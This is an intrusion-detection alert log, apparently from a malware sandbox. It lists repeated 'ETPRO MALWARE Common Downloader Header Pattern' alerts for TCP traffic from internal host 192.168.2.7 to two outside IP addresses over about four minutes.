2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50966	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	54492	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51581	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	55298	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51338	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51225	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51685	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	54598	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51012	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50896	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51256	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50838	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	56767	107.163.241.232	12354	TCP
2024-12-11T16:26:47.397008+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50998	107.163.241.232	12354	TCP
2024-12-11T16:27:06.627467+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49734	107.163.241.232	12354	TCP
2024-12-11T16:27:06.627557+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49735	107.163.241.232	12354	TCP
2024-12-11T16:27:07.049104+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49748	202.108.0.52	80	TCP
2024-12-11T16:27:08.382770+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49757	107.163.241.232	12354	TCP
2024-12-11T16:27:08.382833+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49760	107.163.241.232	12354	TCP
2024-12-11T16:27:10.303701+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49780	202.108.0.52	80	TCP
2024-12-11T16:27:10.679943+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49777	107.163.241.232	12354	TCP
2024-12-11T16:27:10.815471+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49779	107.163.241.232	12354	TCP
2024-12-11T16:27:12.408916+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49799	107.163.241.232	12354	TCP
2024-12-11T16:27:12.409221+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49796	107.163.241.232	12354	TCP
2024-12-11T16:27:14.264524+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49822	202.108.0.52	80	TCP
2024-12-11T16:27:14.644918+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49819	107.163.241.232	12354	TCP
2024-12-11T16:27:14.800806+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49821	107.163.241.232	12354	TCP
2024-12-11T16:27:16.610981+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49838	107.163.241.232	12354	TCP
2024-12-11T16:27:16.611004+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49840	107.163.241.232	12354	TCP
2024-12-11T16:27:19.193651+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49860	202.108.0.52	80	TCP
2024-12-11T16:27:19.454941+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49853	107.163.241.232	12354	TCP
2024-12-11T16:27:19.739714+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49859	107.163.241.232	12354	TCP
2024-12-11T16:27:21.428354+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49879	107.163.241.232	12354	TCP
2024-12-11T16:27:21.428417+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49881	107.163.241.232	12354	TCP
2024-12-11T16:27:23.244884+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49898	202.108.0.52	80	TCP
2024-12-11T16:27:23.661801+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49895	107.163.241.232	12354	TCP
2024-12-11T16:27:23.769866+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49897	107.163.241.232	12354	TCP
2024-12-11T16:27:25.444014+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49920	107.163.241.232	12354	TCP
2024-12-11T16:27:25.444075+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49917	107.163.241.232	12354	TCP
2024-12-11T16:27:27.294348+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49938	202.108.0.52	80	TCP
2024-12-11T16:27:27.674202+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49935	107.163.241.232	12354	TCP
2024-12-11T16:27:27.828872+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49937	107.163.241.232	12354	TCP
2024-12-11T16:27:30.006444+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49952	107.163.241.232	12354	TCP
2024-12-11T16:27:30.550563+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49959	107.163.241.232	12354	TCP
2024-12-11T16:27:31.897999+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49984	107.163.241.232	12354	TCP
2024-12-11T16:27:31.898010+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49975	107.163.241.232	12354	TCP
2024-12-11T16:27:34.129464+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49999	107.163.241.232	12354	TCP
2024-12-11T16:27:34.235463+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50002	107.163.241.232	12354	TCP
2024-12-11T16:27:35.897234+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50029	107.163.241.232	12354	TCP
2024-12-11T16:27:35.897402+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50026	107.163.241.232	12354	TCP
2024-12-11T16:27:38.127664+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50048	107.163.241.232	12354	TCP
2024-12-11T16:27:38.237475+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50051	107.163.241.232	12354	TCP
2024-12-11T16:27:39.912972+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50076	107.163.241.232	12354	TCP
2024-12-11T16:27:39.913107+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50079	107.163.241.232	12354	TCP
2024-12-11T16:27:42.145322+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50097	107.163.241.232	12354	TCP
2024-12-11T16:27:42.284546+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50099	107.163.241.232	12354	TCP
2024-12-11T16:27:43.928362+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50128	107.163.241.232	12354	TCP
2024-12-11T16:27:43.928394+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50126	107.163.241.232	12354	TCP
2024-12-11T16:27:46.159017+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50148	107.163.241.232	12354	TCP
2024-12-11T16:27:46.300044+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50151	107.163.241.232	12354	TCP
2024-12-11T16:27:48.053486+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50179	107.163.241.232	12354	TCP
2024-12-11T16:27:48.053545+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50177	107.163.241.232	12354	TCP
2024-12-11T16:27:50.284179+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50203	107.163.241.232	12354	TCP
2024-12-11T16:27:50.534287+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50205	107.163.241.232	12354	TCP
2024-12-11T16:27:52.212729+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50237	107.163.241.232	12354	TCP
2024-12-11T16:27:52.212767+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50233	107.163.241.232	12354	TCP
2024-12-11T16:27:54.489312+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50247	107.163.241.232	12354	TCP
2024-12-11T16:27:54.863183+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50255	107.163.241.232	12354	TCP
2024-12-11T16:27:56.260934+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50279	107.163.241.232	12354	TCP
2024-12-11T16:27:56.260935+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50285	107.163.241.232	12354	TCP
2024-12-11T16:27:58.597759+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50293	107.163.241.232	12354	TCP
2024-12-11T16:27:58.706758+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50296	107.163.241.232	12354	TCP
2024-12-11T16:28:00.350746+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50328	107.163.241.232	12354	TCP
2024-12-11T16:28:00.350766+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50326	107.163.241.232	12354	TCP
2024-12-11T16:28:02.602771+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50339	107.163.241.232	12354	TCP
2024-12-11T16:28:02.792914+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50342	107.163.241.232	12354	TCP
2024-12-11T16:28:04.524956+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50372	107.163.241.232	12354	TCP
2024-12-11T16:28:04.525020+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50371	107.163.241.232	12354	TCP
2024-12-11T16:28:06.754078+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50390	107.163.241.232	12354	TCP
2024-12-11T16:28:06.925459+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50393	107.163.241.232	12354	TCP
2024-12-11T16:28:09.316693+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50415	107.163.241.232	12354	TCP
2024-12-11T16:28:09.706198+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50422	107.163.241.232	12354	TCP
2024-12-11T16:28:11.178469+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50454	107.163.241.232	12354	TCP
2024-12-11T16:28:11.178527+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50459	107.163.241.232	12354	TCP
2024-12-11T16:28:13.425717+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50464	107.163.241.232	12354	TCP
2024-12-11T16:28:13.539259+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50467	107.163.241.232	12354	TCP
2024-12-11T16:28:15.207629+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50506	107.163.241.232	12354	TCP
2024-12-11T16:28:15.207644+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50509	107.163.241.232	12354	TCP
2024-12-11T16:28:17.441595+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50545	107.163.241.232	12354	TCP
2024-12-11T16:28:17.566055+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50549	107.163.241.232	12354	TCP
2024-12-11T16:28:19.407819+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50603	107.163.241.232	12354	TCP
2024-12-11T16:28:19.407893+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50599	107.163.241.232	12354	TCP
2024-12-11T16:28:21.643002+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50643	107.163.241.232	12354	TCP
2024-12-11T16:28:21.771821+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50648	107.163.241.232	12354	TCP
2024-12-11T16:28:23.432362+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50713	107.163.241.232	12354	TCP
2024-12-11T16:28:23.432404+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50717	107.163.241.232	12354	TCP
2024-12-11T16:28:25.660714+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50762	107.163.241.232	12354	TCP
2024-12-11T16:28:25.877408+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50770	107.163.241.232	12354	TCP
2024-12-11T16:28:27.553374+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50845	107.163.241.232	12354	TCP
2024-12-11T16:28:31.553753+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51048	107.163.241.232	12354	TCP
2024-12-11T16:28:31.553906+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51029	107.163.241.232	12354	TCP
2024-12-11T16:28:33.862365+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51071	107.163.241.232	12354	TCP
2024-12-11T16:28:33.972986+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51084	107.163.241.232	12354	TCP
2024-12-11T16:28:35.678642+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51177	107.163.241.232	12354	TCP
2024-12-11T16:28:38.019436+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51229	107.163.241.232	12354	TCP
2024-12-11T16:28:38.457047+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51258	107.163.241.232	12354	TCP
2024-12-11T16:28:40.740405+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51304	107.163.241.232	12354	TCP
2024-12-11T16:28:41.769700+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51369	107.163.241.232	12354	TCP
2024-12-11T16:28:42.522296+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51461	107.163.241.232	12354	TCP
2024-12-11T16:28:45.127480+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51572	107.163.241.232	12354	TCP
2024-12-11T16:28:45.678419+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51588	107.163.241.232	12354	TCP
2024-12-11T16:28:46.647164+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51748	107.163.241.232	12354	TCP
2024-12-11T16:28:46.647213+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51741	107.163.241.232	12354	TCP
2024-12-11T16:28:49.128947+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51797	107.163.241.232	12354	TCP
2024-12-11T16:28:49.305040+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51807	107.163.241.232	12354	TCP
2024-12-11T16:28:50.772592+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51919	107.163.241.232	12354	TCP
2024-12-11T16:28:50.772633+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51946	107.163.241.232	12354	TCP
2024-12-11T16:28:53.364545+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	52997	107.163.241.232	12354	TCP
2024-12-11T16:28:54.793223+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	55606	107.163.241.232	12354	TCP
2024-12-11T16:28:54.793326+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	54683	107.163.241.232	12354	TCP
2024-12-11T16:28:59.191951+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	56587	107.163.241.232	12354	TCP
2024-12-11T16:28:59.553969+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	57316	107.163.241.232	12354	TCP
2024-12-11T16:29:00.538494+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	58940	107.163.241.232	12354	TCP
2024-12-11T16:29:00.538502+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	59328	107.163.241.232	12354	TCP
2024-12-11T16:29:04.049438+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	61306	107.163.241.232	12354	TCP
2024-12-11T16:29:04.660251+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	61799	107.163.241.232	12354	TCP
2024-12-11T16:29:04.673284+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	63221	107.163.241.232	12354	TCP
2024-12-11T16:29:06.912088+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	63465	107.163.241.232	12354	TCP
2024-12-11T16:29:07.786094+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	64121	107.163.241.232	12354	TCP
2024-12-11T16:29:08.819311+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49614	107.163.241.232	12354	TCP
2024-12-11T16:29:08.819495+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	65244	107.163.241.232	12354	TCP
2024-12-11T16:29:11.239027+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50853	107.163.241.232	12354	TCP
2024-12-11T16:29:11.942307+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	51370	107.163.241.232	12354	TCP
2024-12-11T16:29:12.828788+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	53048	107.163.241.232	12354	TCP
2024-12-11T16:29:12.829086+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	53658	107.163.241.232	12354	TCP
2024-12-11T16:29:15.441867+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	55059	107.163.241.232	12354	TCP
2024-12-11T16:29:15.598441+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	55060	107.163.241.232	12354	TCP
2024-12-11T16:29:16.835308+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	56681	107.163.241.232	12354	TCP
2024-12-11T16:29:16.835311+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	57493	107.163.241.232	12354	TCP
2024-12-11T16:29:19.834432+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	58358	107.163.241.232	12354	TCP
2024-12-11T16:29:19.944181+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	58512	107.163.241.232	12354	TCP
2024-12-11T16:29:20.850742+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	60820	107.163.241.232	12354	TCP
2024-12-11T16:29:20.850802+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	60772	107.163.241.232	12354	TCP
2024-12-11T16:29:23.114747+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	61199	107.163.241.232	12354	TCP
2024-12-11T16:29:23.223453+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	61316	107.163.241.232	12354	TCP
2024-12-11T16:29:25.203995+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	63569	107.163.241.232	12354	TCP
2024-12-11T16:29:25.204001+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	63454	107.163.241.232	12354	TCP
2024-12-11T16:29:27.723682+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	63737	107.163.241.232	12354	TCP
2024-12-11T16:29:29.178557+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	64597	107.163.241.232	12354	TCP
2024-12-11T16:29:29.663645+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	65289	107.163.241.232	12354	TCP
2024-12-11T16:29:29.663668+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	65257	107.163.241.232	12354	TCP
2024-12-11T16:29:31.911465+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49154	107.163.241.232	12354	TCP
2024-12-11T16:29:32.020233+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49190	107.163.241.232	12354	TCP
2024-12-11T16:29:35.193029+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50868	107.163.241.232	12354	TCP
2024-12-11T16:29:35.241204+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50870	107.163.241.232	12354	TCP
2024-12-11T16:29:37.014773+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	52752	107.163.241.232	12354	TCP
2024-12-11T16:29:37.014903+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	52788	107.163.241.232	12354	TCP
2024-12-11T16:29:39.255480+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	52806	107.163.241.232	12354	TCP
2024-12-11T16:29:39.384470+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	52835	107.163.241.232	12354	TCP
2024-12-11T16:29:41.022443+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	54070	107.163.241.232	12354	TCP
2024-12-11T16:29:41.022467+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	54029	107.163.241.232	12354	TCP
2024-12-11T16:29:43.308211+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	54209	107.163.241.232	12354	TCP
2024-12-11T16:29:43.382481+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	54325	107.163.241.232	12354	TCP
2024-12-11T16:29:45.990235+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	56038	107.163.241.232	12354	TCP
2024-12-11T16:29:47.068013+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	56199	107.163.241.232	12354	TCP
2024-12-11T16:29:48.070598+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	57816	107.163.241.232	12354	TCP
2024-12-11T16:29:48.070722+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	57129	107.163.241.232	12354	TCP
2024-12-11T16:29:50.317419+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	58639	107.163.241.232	12354	TCP
2024-12-11T16:29:50.661349+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	58741	107.163.241.232	12354	TCP
2024-12-11T16:29:52.199824+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	60671	107.163.241.232	12354	TCP
2024-12-11T16:29:52.199875+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	60441	107.163.241.232	12354	TCP
2024-12-11T16:29:54.427827+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	61903	107.163.241.232	12354	TCP
2024-12-11T16:29:54.568304+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	61986	107.163.241.232	12354	TCP
2024-12-11T16:29:56.335117+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	63920	107.163.241.232	12354	TCP
2024-12-11T16:29:56.335142+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	63794	107.163.241.232	12354	TCP
2024-12-11T16:29:58.567360+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	65326	107.163.241.232	12354	TCP
2024-12-11T16:29:58.677205+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	65458	107.163.241.232	12354	TCP
2024-12-11T16:30:00.351175+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50847	107.163.241.232	12354	TCP
2024-12-11T16:30:00.351358+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	50825	107.163.241.232	12354	TCP
2024-12-11T16:30:02.605565+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	52005	107.163.241.232	12354	TCP
2024-12-11T16:30:02.756051+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	52150	107.163.241.232	12354	TCP
2024-12-11T16:30:04.355668+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	53912	107.163.241.232	12354	TCP
2024-12-11T16:30:04.355985+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	54033	107.163.241.232	12354	TCP
2024-12-11T16:30:06.582272+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	55293	107.163.241.232	12354	TCP
2024-12-11T16:30:06.833678+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	55419	107.163.241.232	12354	TCP
2024-12-11T16:30:08.366388+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	57352	107.163.241.232	12354	TCP
2024-12-11T16:30:08.366422+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	57129	107.163.241.232	12354	TCP
2024-12-11T16:30:10.680304+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	58562	107.163.241.232	12354	TCP
2024-12-11T16:30:10.788310+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	58708	107.163.241.232	12354	TCP
2024-12-11T16:30:12.370391+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	60121	107.163.241.232	12354	TCP
2024-12-11T16:30:12.370442+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	60021	107.163.241.232	12354	TCP
2024-12-11T16:30:14.599528+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	61491	107.163.241.232	12354	TCP
